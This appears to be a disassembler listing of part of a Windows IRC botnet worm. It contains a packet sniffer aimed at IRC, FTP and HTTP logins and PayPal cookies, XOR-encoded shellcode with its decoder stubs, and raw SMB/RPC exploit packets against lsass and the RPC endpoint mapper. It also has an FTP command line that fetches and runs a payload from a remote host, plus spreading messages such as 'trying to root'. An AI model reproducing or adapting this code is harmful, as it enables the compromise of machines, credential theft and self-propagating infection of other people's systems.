dd 7973243Ah, 6Eh, 4 dup(0)
dd 7973253Ah, 6Eh, 4 dup(0)
dd 4B444320h, 207965h, 4 dup(0)
dd 4E494F4Ah, 2320h, 3 dup(0)
dd 1, 4B43494Eh, 20h, 3 dup(0)
dd 1, 5245504Fh, 20h, 3 dup(0)
dd 1, 7265706Fh, 20h, 3 dup(0)
dd 1, 20776F6Eh, 49206E61h, 4F204352h, 61726570h, 726F74h
dd 1, 52455355h, 20h, 3 dup(0)
dd 2, 53534150h, 20h, 3 dup(0)
dd 2, 70796170h, 6C61h, 3 dup(0)
dd 3, 50594150h, 4C41h, 3 dup(0)
dd 3, 70796170h, 632E6C61h, 6D6Fh, 2 dup(0)
dd 3, 50594150h, 432E4C41h, 4D4Fh, 2 dup(0)
dd 3, 2D746553h, 6B6F6F43h, 3A6569h, 2 dup(0)
dd 3, 6 dup(0)
aHttp db 'HTTP',0 ; DATA XREF: ___:0042440C�o
align 10h
off_424C70 dd offset word_505446 ; DATA XREF: ___:00424408�o
off_424C74 dd offset byte_435249 ; DATA XREF: ___:00424404�o
off_424C78 dd offset word_544F42 ; DATA XREF: ___:off_424400�o
unk_424C7C db 2 ; DATA XREF: sub_402822+2FC�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorRecvFaile db 'Error: recv() failed, returned: <%d>',0
align 10h
unk_424CC0 db 2 ; DATA XREF: sub_402822+2AB�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aSuspiciousSPac db 'Suspicious %s packet from: %s:%d - %s.',0
align 4
aPsniff_0 db '[PSNIFF]',0 ; DATA XREF: sub_402822+235�o
align 10h
unk_424D10 db 2 ; DATA XREF: sub_402822+186�o
; sub_402E92+144�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorWsaioctlF db 'Error: WSAIoctl() failed, returned: <%d>.',0
align 4
unk_424D58 db 2 ; DATA XREF: sub_402822+103�o
; sub_402E92+C5�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorBindFaile db 'Error: bind() failed, returned: <%d>.',0
align 4
unk_424D9C db 2 ; DATA XREF: sub_402822+85�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorSocketF_1 db 'Error: socket() failed, returned: <%d>.',0
aHashin db ':!hashin',0 ; DATA XREF: sub_402B92+103�o
align 4
a_hashin db ':.hashin',0 ; DATA XREF: sub_402B92+EE�o
align 4
aIdent db ':!ident',0 ; DATA XREF: sub_402B92+D9�o
a_ident db ':.ident',0 ; DATA XREF: sub_402B92+C8�o
a_login db ':.Login',0 ; DATA XREF: sub_402B92+B7�o
aLogin db ':!Login',0 ; DATA XREF: sub_402B92+A6�o
aLogin_0 db ':!login',0 ; DATA XREF: sub_402B92+95�o
a_login_0 db ':.login',0 ; DATA XREF: sub_402B92+84�o
a366 db '366 ',0 ; DATA XREF: sub_402B92+73�o
align 10h
a302 db '302 ',0 ; DATA XREF: sub_402B92:loc_402BF4�o
align 4
aJoin db 'JOIN #',0 ; DATA XREF: sub_402B92+4D�o
align 10h
aPsniff_1 db 'PSNIFF//',0 ; DATA XREF: sub_402B92+3C�o
align 4
aPsniff_2 db '[PSNIFF]:',0 ; DATA XREF: sub_402B92+2B�o
align 4
aBotSniff db 'Bot sniff',0 ; DATA XREF: sub_402B92+5�o
align 4
aYouAreNowAnIrc db 'You are now an IRC Operator',0 ; DATA XREF: sub_402CA9+62�o
aOper db 'oper ',0 ; DATA XREF: sub_402CA9+51�o
align 4
aNick_0 db 'NICK ',0 ; DATA XREF: sub_402CA9:loc_402CE9�o
; sub_402D1F+2B�o
align 10h
aOper_0 db 'OPER ',0 ; DATA XREF: sub_402CA9+2B�o
align 4
aIrcSniff db 'IRC sniff',0 ; DATA XREF: sub_402CA9+5�o
align 4
aPass_0 db 'PASS ',0 ; DATA XREF: sub_402D1F+73�o
align 4
aUser_2 db 'USER ',0 ; DATA XREF: sub_402D1F+62�o
align 4
a230 db '230 ',0 ; DATA XREF: sub_402D1F:loc_402D70�o
align 4
a220 db '220 ',0 ; DATA XREF: sub_402D1F+3C�o
align 4
aFtpSniff db 'FTP sniff',0 ; DATA XREF: sub_402D1F+5�o
align 10h
aSetCookie db 'Set-Cookie:',0 ; DATA XREF: sub_402DA6+73�o
aPaypal_com db 'paypal.com',0 ; DATA XREF: sub_402DA6+62�o
align 4
aPaypal_com_0 db 'PAYPAL.COM',0 ; DATA XREF: sub_402DA6+51�o
align 4
aPaypal_0 db 'PAYPAL',0 ; DATA XREF: sub_402DA6:loc_402DE6�o
align 4
aPaypal db 'paypal',0 ; DATA XREF: sub_402DA6+2B�o
align 4
aHttpSniff db 'HTTP sniff',0 ; DATA XREF: sub_402DA6+5�o
align 10h
aOpenssh_2 db 'OpenSSH_2',0 ; DATA XREF: sub_402E2D+51�o
align 4
aServUFtpServer db 'Serv-U FTP Server',0 ; DATA XREF: sub_402E2D:loc_402E6D�o
align 10h
aOpenssl0_9_6 db 'OpenSSL/0.9.6',0 ; DATA XREF: sub_402E2D+2B�o
align 10h
aVulnSniff db 'VULN sniff',0 ; DATA XREF: sub_402E2D+5�o
align 4
unk_424F4C db 2 ; DATA XREF: sub_402E92+3E5�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aVulnSniffSDToS db 'VULN sniff "%s:%d" to "%s:%d": - "%s"',0
align 10h
unk_424F90 db 2 ; DATA XREF: sub_402E92+37B�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aHttpSniffSDToS db 'HTTP sniff "%s:%d" to "%s:%d": - "%s"',0
align 4
unk_424FD4 db 2 ; DATA XREF: sub_402E92+34A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFtpSniffSDToSD db 'FTP sniff "%s:%d" to "%s:%d": - "%s"',0
align 4
unk_425018 db 2 ; DATA XREF: sub_402E92+314�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Eh, 69h
db 66h ; f
db 66h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aIrcSniffSDToSD db 'IRC sniff "%s:%d" to "%s:%d": - "%s"',0
align 4
dword_42505C dd 7A026E02h, 201F6D1Fh, 696E7328h, 702E6666h, 671F6C1Fh
; DATA XREF: sub_402E92+2DB�o
dd 0BB022029h, 202002BBh, 20746F42h, 66696E73h, 25222066h
dd 64253A73h, 6F742022h, 73252220h, 2264253Ah, 202D203Ah
dd 22732522h, 0
; ---------------------------------------------------------------------------
jmp short loc_4250B2
; =============== S U B R O U T I N E =======================================
sub_4250A2 proc far ; CODE XREF: sub_4250A2:loc_4250B2�p
pop ebx
dec ebx
xor ecx, ecx
mov cx, 125h
loc_4250AA: ; CODE XREF: sub_4250A2+C�j
xor byte ptr [ebx+ecx], 99h
loop loc_4250AA
jmp short loc_4250B7
; ---------------------------------------------------------------------------
loc_4250B2: ; CODE XREF: ___:004250A0�j
call near ptr sub_4250A2
loc_4250B7: ; CODE XREF: sub_4250A2+E�j
jo short loc_42511B
cdq
cdq
cdq
mov ch, 38h
test eax, 12999999h
fst dword ptr [ebp+3485E912h]
adc dh, cl
xchg eax, ecx
adc ch, [esi-0Dh]
popf
sal byte ptr [ecx+2], 99h
cdq
cdq
jnp short loc_425139
icebp
stosb
stosd
cdq
cdq
icebp
out dx, al
jmp far ptr 128Fh:66CDC6ABh
; ---------------------------------------------------------------------------
db 71h
dd 71C09DF3h, 9999991Bh, 7518607Bh, 99999809h, 9898F1CDh
dd 0CF669999h, 0C9C9C989h, 0D9C9D9C9h, 8DCF66C9h, 0E6F14112h
dd 0F1989999h, 4B9D999Bh
; ---------------------------------------------------------------------------
adc dl, [ebp-0Dh]
loc_42511B: ; CODE XREF: sub_4250A2:loc_4250B7�j
mov eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dd 0EC591C81h, 0F4FAF1D3h, 0FF1099FDh, 0CD751AA9h, 0F3BDA514h
dd 7B32C08Ch
db 64h
; ---------------------------------------------------------------------------
loc_425139: ; CODE XREF: sub_4250A2+35�j
pop edi
fnstsw word ptr [ebp-22982277h]
mov ebp, 0BDC510A4h
rcl dword ptr [eax], 1
lds edi, [ebp-423AEF2Bh]
leave
adc al, 0DDh
mov ebp, 0C8C9CD89h
enter 0FFFFF3C8h, 98h
enter 66C8h, 0EFh
test eax, 9DCF66C8h
adc dl, [ebp-0Dh]
db 66h, 66h
test al, 66h
iret
sub_4250A2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xchg eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dw 6685h
dd 0CFC895CFh, 12A5DC12h, 9AE1B1CDh, 0EB12CB4Ch, 0AA6C9AB9h
dd 34D8D050h, 42AA5C9Ah, 0A3892796h, 5891ED4Fh, 439A9452h
dd 0A26872D9h, 0C37EEC86h, 9ABDC312h, 9512FF44h, 85C312D2h
dd 9D12449Ah, 325C9A12h, 715AC0C7h, 66666699h, 7597D717h
dd 8F2A67EBh, 579C4034h, 0F9795776h, 0A2657452h, 346C9040h
dd 0F9336075h, 0E05FE07Eh, 0
; ---------------------------------------------------------------------------
loc_4251E0: ; DATA XREF: sub_4033C9+150�o
; sub_4033C9+20D�o
jmp short loc_4251F2
; =============== S U B R O U T I N E =======================================
sub_4251E2 proc near ; CODE XREF: sub_4251E2:loc_4251F2�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_4251EA: ; CODE XREF: sub_4251E2+C�j
xor byte ptr [edx+ecx], 99h
loop loc_4251EA
jmp short loc_4251F7
; ---------------------------------------------------------------------------
loc_4251F2: ; CODE XREF: ___:loc_4251E0�j
call sub_4251E2
loc_4251F7: ; CODE XREF: sub_4251E2+E�j
jo short near ptr dword_425170+1Eh
cwde
cdq
cdq
retn
sub_4251E2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_425290 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_4033C9+101�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_425378 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_40381E+7F�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_425404 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40381E+AA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_4254B0 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40381E+CF�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_425590 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4033C9+57�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_4033C9+86�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_4255F4 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4033C9+2B0�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_425660 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4033C9+2DB�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_425704 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4033C9+3C3�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_425784 dd offset loc_401495 ; DATA XREF: sub_4033C9+3F1�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset sub_40707C
dd 1, 0
dd 1, 0
dd offset sub_40707C
dd 1, 0
dd 1, 0
dd offset sub_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_425818 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4033C9+314�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_425884 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4033C9+33F�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_4258F8 dd 0 dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 2 dup(0)
word_425980 dw 0AD9Dh ; DATA XREF: sub_40327E+30�r
; sub_4033C9+E3�r
align 4
dd 2 dup(0)
aWinxpProfessio db 'WinXP Professional [universal] lsass.exe ',0
align 10h
dword_4259C0 dd 1004600h ; sub_4033C9+240�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0Fh dup(0)
dword_425A78 dd 0A0D7325h, 0 ; sub_404197+102�o ...
aEchoOpenSDEqEc db 'echo open %s %d >> eq&echo user %s %s >> eq &echo get %s >> eq &e'
; DATA XREF: sub_40327E+A4�o
db 'cho quit >> eq &ftp -n -s:eq &%s',0Dh,0Ah,0
; ---------------------------------------------------------------------------
loc_425AE4: ; DATA XREF: sub_4033C9+171�o
; sub_4042F8+177�o
jmp short loc_425AEC
; ---------------------------------------------------------------------------
jmp short loc_425AEE
; ---------------------------------------------------------------------------
dd 0
; ---------------------------------------------------------------------------
loc_425AEC: ; CODE XREF: ___:loc_425AE4�j
; DATA XREF: sub_4033C9+27�o ...
pop esp
pop esp
loc_425AEE: ; CODE XREF: ___:00425AE6�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_425AF8 dd 1CEC8166h ; sub_4042F8+D�r
dword_425AFC dd 0E4FF07h ; sub_4042F8+16�r
unk_425B00 db 2 ; DATA XREF: sub_40381E+173�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUsingSExploitA db ' using %s exploit and sending file to %s',0
align 4
dword_425B44 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 ; sub_403E35+21B�o
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_425B90 dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: sub_403BE2+123�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_425EF4 dd 20h, 0 dd 20h, 5C005Ch, 0
off_425F08 dd offset off_43005C ; DATA XREF: sub_403BE2+15D�o
dd offset dword_5C0024
a12345611111111:
unicode 0, <123456111111111111111.doc>,0
align 8
dword_425F48 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
off_425F7C dd offset word_580046 ; DATA XREF: sub_403BE2+45�o
dd offset loc_42004D+1
dd offset word_580046
dd offset word_580046
dd offset loc_42004D+1
dd offset word_580046
dd offset word_580046
dd offset word_580046
dd offset word_580046
dd 0FFFFFFFFh, 2 dup(7FFDE0CCh), 0
aRrrrrrrrrrrrrr db ''
db ''
db '',0
dword_426058 dd 18759Fh dword_42605C dd 100139Dh off_426060 dd offset dword_5C005C ; DATA XREF: sub_403A47+1C�o
; sub_403B2A+16�o
align 8
off_426068 dd offset dword_49005C ; DATA XREF: sub_403A47+C�o
; sub_403B2A+B�o
dd offset off_430050
dd 24h
unk_426074 db 2 ; DATA XREF: sub_403E35+2E9�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 25h, 73h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aTryingToRootS db ' trying to root %s',0
align 10h
unk_4260A0 db 2 ; DATA XREF: sub_403E35+29C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aTransferComple db ' transfer complete to IP: %s',0
align 4
aSPipeEpmapper db '\\%s\pipe\epmapper',0 ; DATA XREF: sub_403E35+41�o
align 10h
jmp short loc_426102
; =============== S U B R O U T I N E =======================================
sub_4260F2 proc far ; CODE XREF: sub_4260F2:loc_426102�p
pop ebx
dec ebx
xor ecx, ecx
mov cx, 125h
loc_4260FA: ; CODE XREF: sub_4260F2+C�j
xor byte ptr [ebx+ecx], 99h
loop loc_4260FA
jmp short loc_426107
; ---------------------------------------------------------------------------
loc_426102: ; CODE XREF: ___:004260F0�j
call near ptr sub_4260F2
loc_426107: ; CODE XREF: sub_4260F2+E�j
jo short loc_42616B
cdq
cdq
cdq
mov ch, 38h
test eax, 12999999h
fst dword ptr [ebp+3485E912h]
adc dh, cl
xchg eax, ecx
adc ch, [esi-0Dh]
popf
sal byte ptr [ecx+2], 99h
cdq
cdq
jnp short loc_426189
icebp
stosb
stosd
cdq
cdq
icebp
out dx, al
jmp far ptr 128Fh:66CDC6ABh
; ---------------------------------------------------------------------------
db 71h
dd 71C09DF3h, 9999991Bh, 7518607Bh, 99999809h, 9898F1CDh
dd 0CF669999h, 0C9C9C989h, 0D9C9D9C9h, 8DCF66C9h, 0E6F14112h
dd 0F1989999h, 4B9D999Bh
; ---------------------------------------------------------------------------
adc dl, [ebp-0Dh]
loc_42616B: ; CODE XREF: sub_4260F2:loc_426107�j
mov eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dd 0EC591C81h, 0F4FAF1D3h, 0FF1099FDh, 0CD751AA9h, 0F3BDA514h
dd 7B32C08Ch
db 64h
; ---------------------------------------------------------------------------
loc_426189: ; CODE XREF: sub_4260F2+35�j
pop edi
fnstsw word ptr [ebp-22982277h]
mov ebp, 0BDC510A4h
rcl dword ptr [eax], 1
lds edi, [ebp-423AEF2Bh]
leave
adc al, 0DDh
mov ebp, 0C8C9CD89h
enter 0FFFFF3C8h, 98h
enter 66C8h, 0EFh
test eax, 9DCF66C8h
adc dl, [ebp-0Dh]
db 66h, 66h
test al, 66h
iret
sub_4260F2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xchg eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dw 6685h
dd 0CFC895CFh, 12A5DC12h, 9AE1B1CDh, 0EB12CB4Ch, 0AA6C9AB9h
dd 34D8D050h, 42AA5C9Ah, 0A3892796h, 5891ED4Fh, 439A9452h
dd 0A26872D9h, 0C37EEC86h, 9ABDC312h, 9512FF44h, 85C312D2h
dd 9D12449Ah, 325C9A12h, 715AC0C7h, 66666699h, 7597D717h
dd 8F2A67EBh, 579C4034h, 0F9795776h, 0A2657452h, 346C9040h
dd 0F9336075h, 0E05FE07Eh, 0
; ---------------------------------------------------------------------------
loc_426230: ; DATA XREF: sub_4042F8+156�o
; sub_4042F8+212�o
jmp short loc_426242
; =============== S U B R O U T I N E =======================================
sub_426232 proc near ; CODE XREF: sub_426232:loc_426242�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_42623A: ; CODE XREF: sub_426232+C�j
xor byte ptr [edx+ecx], 99h
loop loc_42623A
jmp short loc_426247
; ---------------------------------------------------------------------------
loc_426242: ; CODE XREF: ___:loc_426230�j
call sub_426232
loc_426247: ; CODE XREF: sub_426232+E�j
jo short near ptr dword_4261C0+1Eh
cwde
cdq
cdq
retn
sub_426232 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_4262E0 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_4042F8+105�o
